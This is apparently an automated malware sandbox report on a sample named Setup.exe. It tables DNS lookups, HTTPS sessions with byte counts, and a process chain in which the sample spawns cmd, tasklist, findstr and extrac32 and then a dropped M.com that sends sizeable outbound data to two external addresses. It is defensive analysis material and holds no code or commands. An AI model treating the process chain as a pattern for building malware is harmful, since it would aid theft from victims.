Jan 7, 2025 14:35:53.393228054 CET | 49978 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:53.393259048 CET | 49978 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:53.402812958 CET | 443 | 49978 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:53.402983904 CET | 49978 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:53.403004885 CET | 443 | 49978 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:53.403029919 CET | 49978 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:53.403060913 CET | 49978 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:53.403084993 CET | 443 | 49978 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:53.403105974 CET | 49978 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:53.407233000 CET | 443 | 49978 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:54.967155933 CET | 443 | 49978 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:54.967253923 CET | 443 | 49978 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:54.967324018 CET | 49978 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:54.967511892 CET | 49978 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:54.967523098 CET | 443 | 49978 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:54.970452070 CET | 49981 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:54.970484018 CET | 443 | 49981 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:54.970575094 CET | 49981 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:54.970825911 CET | 49981 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:54.970838070 CET | 443 | 49981 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:55.424590111 CET | 443 | 49981 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:55.424658060 CET | 49981 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:55.425887108 CET | 49981 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:55.425895929 CET | 443 | 49981 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:55.426126957 CET | 443 | 49981 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:55.427289009 CET | 49981 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:55.427310944 CET | 49981 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:55.427364111 CET | 443 | 49981 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:55.881623983 CET | 443 | 49981 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:55.881727934 CET | 443 | 49981 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:55.881789923 CET | 49981 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:55.882036924 CET | 49981 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:55.882049084 CET | 443 | 49981 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:55.882066965 CET | 49981 | 443 | 192.168.2.7 | 104.21.80.1 |
Jan 7, 2025 14:35:55.882071972 CET | 443 | 49981 | 104.21.80.1 | 192.168.2.7 |
Jan 7, 2025 14:35:55.995626926 CET | 49983 | 443 | 192.168.2.7 | 185.161.251.21 |
Jan 7, 2025 14:35:55.995656967 CET | 443 | 49983 | 185.161.251.21 | 192.168.2.7 |
Jan 7, 2025 14:35:55.995718956 CET | 49983 | 443 | 192.168.2.7 | 185.161.251.21 |
Jan 7, 2025 14:35:55.996095896 CET | 49983 | 443 | 192.168.2.7 | 185.161.251.21 |
Jan 7, 2025 14:35:55.996115923 CET | 443 | 49983 | 185.161.251.21 | 192.168.2.7 |
Jan 7, 2025 14:35:56.657046080 CET | 443 | 49983 | 185.161.251.21 | 192.168.2.7 |
Jan 7, 2025 14:35:56.657124043 CET | 49983 | 443 | 192.168.2.7 | 185.161.251.21 |
Jan 7, 2025 14:35:56.658818960 CET | 49983 | 443 | 192.168.2.7 | 185.161.251.21 |
Jan 7, 2025 14:35:56.658826113 CET | 443 | 49983 | 185.161.251.21 | 192.168.2.7 |
Jan 7, 2025 14:35:56.659064054 CET | 443 | 49983 | 185.161.251.21 | 192.168.2.7 |
Jan 7, 2025 14:35:56.660331011 CET | 49983 | 443 | 192.168.2.7 | 185.161.251.21 |
Jan 7, 2025 14:35:56.707334995 CET | 443 | 49983 | 185.161.251.21 | 192.168.2.7 |
Jan 7, 2025 14:35:56.927859068 CET | 443 | 49983 | 185.161.251.21 | 192.168.2.7 |
Jan 7, 2025 14:35:56.927931070 CET | 443 | 49983 | 185.161.251.21 | 192.168.2.7 |
Jan 7, 2025 14:35:56.928184986 CET | 49983 | 443 | 192.168.2.7 | 185.161.251.21 |
Jan 7, 2025 14:35:56.928235054 CET | 49983 | 443 | 192.168.2.7 | 185.161.251.21 |
Jan 7, 2025 14:35:56.928252935 CET | 443 | 49983 | 185.161.251.21 | 192.168.2.7 |
Jan 7, 2025 14:35:56.928272009 CET | 49983 | 443 | 192.168.2.7 | 185.161.251.21 |
Jan 7, 2025 14:35:56.928277969 CET | 443 | 49983 | 185.161.251.21 | 192.168.2.7 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 7, 2025 14:35:06.107479095 CET | 65462 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 7, 2025 14:35:06.122606039 CET | 53 | 65462 | 1.1.1.1 | 192.168.2.7 |
Jan 7, 2025 14:35:42.663029909 CET | 54226 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 7, 2025 14:35:42.672651052 CET | 53 | 54226 | 1.1.1.1 | 192.168.2.7 |
Jan 7, 2025 14:35:42.674537897 CET | 59142 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 7, 2025 14:35:42.684787035 CET | 53 | 59142 | 1.1.1.1 | 192.168.2.7 |
Jan 7, 2025 14:35:42.693789959 CET | 59418 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 7, 2025 14:35:42.703335047 CET | 53 | 59418 | 1.1.1.1 | 192.168.2.7 |
Jan 7, 2025 14:35:42.707734108 CET | 62120 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 7, 2025 14:35:42.717020035 CET | 53 | 62120 | 1.1.1.1 | 192.168.2.7 |
Jan 7, 2025 14:35:42.718754053 CET | 53239 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 7, 2025 14:35:42.727742910 CET | 53 | 53239 | 1.1.1.1 | 192.168.2.7 |
Jan 7, 2025 14:35:42.730971098 CET | 60755 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 7, 2025 14:35:42.740016937 CET | 53 | 60755 | 1.1.1.1 | 192.168.2.7 |
Jan 7, 2025 14:35:42.763053894 CET | 61941 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 7, 2025 14:35:42.772114992 CET | 53 | 61941 | 1.1.1.1 | 192.168.2.7 |
Jan 7, 2025 14:35:42.776894093 CET | 51255 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 7, 2025 14:35:42.785381079 CET | 53 | 51255 | 1.1.1.1 | 192.168.2.7 |
Jan 7, 2025 14:35:42.789441109 CET | 56521 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 7, 2025 14:35:42.798664093 CET | 53 | 56521 | 1.1.1.1 | 192.168.2.7 |
Jan 7, 2025 14:35:42.804527998 CET | 60854 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 7, 2025 14:35:42.811243057 CET | 53 | 60854 | 1.1.1.1 | 192.168.2.7 |
Jan 7, 2025 14:35:44.243153095 CET | 52681 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 7, 2025 14:35:44.255773067 CET | 53 | 52681 | 1.1.1.1 | 192.168.2.7 |
Jan 7, 2025 14:35:55.885113001 CET | 61388 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 7, 2025 14:35:55.994885921 CET | 53 | 61388 | 1.1.1.1 | 192.168.2.7 |
Jan 7, 2025 14:35:56.943334103 CET | 62065 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 7, 2025 14:35:56.952400923 CET | 53 | 62065 | 1.1.1.1 | 192.168.2.7 |
Jan 7, 2025 14:35:57.599208117 CET | 57912 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 7, 2025 14:35:57.609219074 CET | 53 | 57912 | 1.1.1.1 | 192.168.2.7 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Jan 7, 2025 14:35:06.107479095 CET | 192.168.2.7 | 1.1.1.1 | 0x128a | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:35:42.663029909 CET | 192.168.2.7 | 1.1.1.1 | 0x6aac | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:35:42.674537897 CET | 192.168.2.7 | 1.1.1.1 | 0xc663 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:35:42.693789959 CET | 192.168.2.7 | 1.1.1.1 | 0x72d8 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:35:42.707734108 CET | 192.168.2.7 | 1.1.1.1 | 0x4074 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:35:42.718754053 CET | 192.168.2.7 | 1.1.1.1 | 0x8526 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:35:42.730971098 CET | 192.168.2.7 | 1.1.1.1 | 0x1b59 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:35:42.763053894 CET | 192.168.2.7 | 1.1.1.1 | 0x8afe | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:35:42.776894093 CET | 192.168.2.7 | 1.1.1.1 | 0x543b | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:35:42.789441109 CET | 192.168.2.7 | 1.1.1.1 | 0x63f7 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:35:42.804527998 CET | 192.168.2.7 | 1.1.1.1 | 0xceb4 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:35:44.243153095 CET | 192.168.2.7 | 1.1.1.1 | 0x7b1b | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:35:55.885113001 CET | 192.168.2.7 | 1.1.1.1 | 0xdfc2 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:35:56.943334103 CET | 192.168.2.7 | 1.1.1.1 | 0xdc6a | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:35:57.599208117 CET | 192.168.2.7 | 1.1.1.1 | 0x14e0 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jan 7, 2025 14:35:06.122606039 CET | 1.1.1.1 | 192.168.2.7 | 0x128a | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:35:42.672651052 CET | 1.1.1.1 | 192.168.2.7 | 0x6aac | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:35:42.684787035 CET | 1.1.1.1 | 192.168.2.7 | 0xc663 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:35:42.703335047 CET | 1.1.1.1 | 192.168.2.7 | 0x72d8 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:35:42.717020035 CET | 1.1.1.1 | 192.168.2.7 | 0x4074 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:35:42.727742910 CET | 1.1.1.1 | 192.168.2.7 | 0x8526 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:35:42.740016937 CET | 1.1.1.1 | 192.168.2.7 | 0x1b59 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:35:42.772114992 CET | 1.1.1.1 | 192.168.2.7 | 0x8afe | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:35:42.785381079 CET | 1.1.1.1 | 192.168.2.7 | 0x543b | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:35:42.798664093 CET | 1.1.1.1 | 192.168.2.7 | 0x63f7 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:35:42.811243057 CET | 1.1.1.1 | 192.168.2.7 | 0xceb4 | No error (0) | 104.102.49.254 | A (IP address) | IN (0x0001) | false | ||
Jan 7, 2025 14:35:44.255773067 CET | 1.1.1.1 | 192.168.2.7 | 0x7b1b | No error (0) | 104.21.80.1 | A (IP address) | IN (0x0001) | false | ||
Jan 7, 2025 14:35:44.255773067 CET | 1.1.1.1 | 192.168.2.7 | 0x7b1b | No error (0) | 104.21.32.1 | A (IP address) | IN (0x0001) | false | ||
Jan 7, 2025 14:35:44.255773067 CET | 1.1.1.1 | 192.168.2.7 | 0x7b1b | No error (0) | 104.21.96.1 | A (IP address) | IN (0x0001) | false | ||
Jan 7, 2025 14:35:44.255773067 CET | 1.1.1.1 | 192.168.2.7 | 0x7b1b | No error (0) | 104.21.112.1 | A (IP address) | IN (0x0001) | false | ||
Jan 7, 2025 14:35:44.255773067 CET | 1.1.1.1 | 192.168.2.7 | 0x7b1b | No error (0) | 104.21.16.1 | A (IP address) | IN (0x0001) | false | ||
Jan 7, 2025 14:35:44.255773067 CET | 1.1.1.1 | 192.168.2.7 | 0x7b1b | No error (0) | 104.21.48.1 | A (IP address) | IN (0x0001) | false | ||
Jan 7, 2025 14:35:44.255773067 CET | 1.1.1.1 | 192.168.2.7 | 0x7b1b | No error (0) | 104.21.64.1 | A (IP address) | IN (0x0001) | false | ||
Jan 7, 2025 14:35:55.994885921 CET | 1.1.1.1 | 192.168.2.7 | 0xdfc2 | No error (0) | 185.161.251.21 | A (IP address) | IN (0x0001) | false | ||
Jan 7, 2025 14:35:56.952400923 CET | 1.1.1.1 | 192.168.2.7 | 0xdc6a | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 7, 2025 14:35:57.609219074 CET | 1.1.1.1 | 192.168.2.7 | 0x14e0 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.7 | 49906 | 104.102.49.254 | 443 | 760 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 13:35:43 UTC | 219 | OUT | |
2025-01-07 13:35:44 UTC | 1905 | IN | |
2025-01-07 13:35:44 UTC | 14479 | IN | |
2025-01-07 13:35:44 UTC | 16384 | IN | |
2025-01-07 13:35:44 UTC | 3768 | IN | |
2025-01-07 13:35:44 UTC | 495 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.7 | 49915 | 104.21.80.1 | 443 | 760 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 13:35:44 UTC | 263 | OUT | |
2025-01-07 13:35:44 UTC | 8 | OUT | |
2025-01-07 13:35:45 UTC | 1123 | IN | |
2025-01-07 13:35:45 UTC | 7 | IN | |
2025-01-07 13:35:45 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.7 | 49925 | 104.21.80.1 | 443 | 760 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 13:35:45 UTC | 264 | OUT | |
2025-01-07 13:35:45 UTC | 78 | OUT | |
2025-01-07 13:35:46 UTC | 1121 | IN | |
2025-01-07 13:35:46 UTC | 248 | IN | |
2025-01-07 13:35:46 UTC | 1369 | IN | |
2025-01-07 13:35:46 UTC | 1369 | IN | |
2025-01-07 13:35:46 UTC | 1369 | IN | |
2025-01-07 13:35:46 UTC | 1369 | IN | |
2025-01-07 13:35:46 UTC | 1369 | IN | |
2025-01-07 13:35:46 UTC | 1369 | IN | |
2025-01-07 13:35:46 UTC | 1369 | IN | |
2025-01-07 13:35:46 UTC | 1369 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.7 | 49933 | 104.21.80.1 | 443 | 760 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 13:35:47 UTC | 276 | OUT | |
2025-01-07 13:35:47 UTC | 12807 | OUT | |
2025-01-07 13:35:47 UTC | 1124 | IN | |
2025-01-07 13:35:47 UTC | 20 | IN | |
2025-01-07 13:35:47 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.7 | 49942 | 104.21.80.1 | 443 | 760 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 13:35:48 UTC | 274 | OUT | |
2025-01-07 13:35:48 UTC | 15027 | OUT | |
2025-01-07 13:35:48 UTC | 1124 | IN | |
2025-01-07 13:35:48 UTC | 20 | IN | |
2025-01-07 13:35:48 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.7 | 49950 | 104.21.80.1 | 443 | 760 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 13:35:49 UTC | 282 | OUT | |
2025-01-07 13:35:49 UTC | 15331 | OUT | |
2025-01-07 13:35:49 UTC | 5069 | OUT | |
2025-01-07 13:35:50 UTC | 1135 | IN | |
2025-01-07 13:35:50 UTC | 20 | IN | |
2025-01-07 13:35:50 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.7 | 49960 | 104.21.80.1 | 443 | 760 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 13:35:50 UTC | 277 | OUT | |
2025-01-07 13:35:50 UTC | 3797 | OUT | |
2025-01-07 13:35:51 UTC | 1123 | IN | |
2025-01-07 13:35:51 UTC | 20 | IN | |
2025-01-07 13:35:51 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.7 | 49967 | 104.21.80.1 | 443 | 760 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 13:35:51 UTC | 271 | OUT | |
2025-01-07 13:35:51 UTC | 1143 | OUT | |
2025-01-07 13:35:52 UTC | 1134 | IN | |
2025-01-07 13:35:52 UTC | 20 | IN | |
2025-01-07 13:35:52 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.7 | 49978 | 104.21.80.1 | 443 | 760 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 13:35:53 UTC | 275 | OUT | |
2025-01-07 13:35:53 UTC | 15331 | OUT | |
2025-01-07 13:35:53 UTC | 15331 | OUT | |
2025-01-07 13:35:53 UTC | 15331 | OUT | |
2025-01-07 13:35:53 UTC | 15331 | OUT | |
2025-01-07 13:35:53 UTC | 15331 | OUT | |
2025-01-07 13:35:53 UTC | 15331 | OUT | |
2025-01-07 13:35:53 UTC | 15331 | OUT | |
2025-01-07 13:35:53 UTC | 15331 | OUT | |
2025-01-07 13:35:53 UTC | 15331 | OUT | |
2025-01-07 13:35:53 UTC | 15331 | OUT | |
2025-01-07 13:35:54 UTC | 1133 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
9 | 192.168.2.7 | 49981 | 104.21.80.1 | 443 | 760 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 13:35:55 UTC | 265 | OUT | |
2025-01-07 13:35:55 UTC | 113 | OUT | |
2025-01-07 13:35:55 UTC | 1130 | IN | |
2025-01-07 13:35:55 UTC | 218 | IN | |
2025-01-07 13:35:55 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
10 | 192.168.2.7 | 49983 | 185.161.251.21 | 443 | 760 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-07 13:35:56 UTC | 201 | OUT | |
2025-01-07 13:35:56 UTC | 249 | IN | |
2025-01-07 13:35:56 UTC | 329 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 08:35:00 |
Start date: | 07/01/2025 |
Path: | C:\Users\user\Desktop\Setup.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 1'189'231 bytes |
MD5 hash: | 873F5709BF55A0AAF991044C645CF8EB |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 2 |
Start time: | 08:35:01 |
Start date: | 07/01/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x410000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 08:35:01 |
Start date: | 07/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff75da10000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 08:35:02 |
Start date: | 07/01/2025 |
Path: | C:\Windows\SysWOW64\tasklist.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xbf0000 |
File size: | 79'360 bytes |
MD5 hash: | 0A4448B31CE7F83CB7691A2657F330F1 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 08:35:02 |
Start date: | 07/01/2025 |
Path: | C:\Windows\SysWOW64\findstr.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xc10000 |
File size: | 29'696 bytes |
MD5 hash: | F1D4BE0E99EC734376FDE474A8D4EA3E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 11 |
Start time: | 08:35:03 |
Start date: | 07/01/2025 |
Path: | C:\Windows\SysWOW64\tasklist.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xbf0000 |
File size: | 79'360 bytes |
MD5 hash: | 0A4448B31CE7F83CB7691A2657F330F1 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 12 |
Start time: | 08:35:03 |
Start date: | 07/01/2025 |
Path: | C:\Windows\SysWOW64\findstr.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xc10000 |
File size: | 29'696 bytes |
MD5 hash: | F1D4BE0E99EC734376FDE474A8D4EA3E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 13 |
Start time: | 08:35:03 |
Start date: | 07/01/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x410000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 14 |
Start time: | 08:35:04 |
Start date: | 07/01/2025 |
Path: | C:\Windows\SysWOW64\extrac32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x990000 |
File size: | 29'184 bytes |
MD5 hash: | 9472AAB6390E4F1431BAA912FCFF9707 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Target ID: | 15 |
Start time: | 08:35:04 |
Start date: | 07/01/2025 |
Path: | C:\Windows\SysWOW64\findstr.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xc10000 |
File size: | 29'696 bytes |
MD5 hash: | F1D4BE0E99EC734376FDE474A8D4EA3E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 16 |
Start time: | 08:35:04 |
Start date: | 07/01/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x410000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 17 |
Start time: | 08:35:05 |
Start date: | 07/01/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x410000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 18 |
Start time: | 08:35:05 |
Start date: | 07/01/2025 |
Path: | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x390000 |
File size: | 947'288 bytes |
MD5 hash: | 62D09F076E6E0240548C2F837536A46A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Antivirus matches: |
|
Has exited: | true |
Target ID: | 19 |
Start time: | 08:35:05 |
Start date: | 07/01/2025 |
Path: | C:\Windows\SysWOW64\choice.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x980000 |
File size: | 28'160 bytes |
MD5 hash: | FCE0E41C87DC4ABBE976998AD26C27E4 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 22 |
Start time: | 09:48:08 |
Start date: | 07/01/2025 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x790000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 23 |
Start time: | 09:48:08 |
Start date: | 07/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff75da10000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Execution Graph
Execution Coverage: | 18.6% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 20.7% |
Total number of Nodes: | 1525 |
Total number of Limit Nodes: | 34 |
Graph
Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406805 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 212stringCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
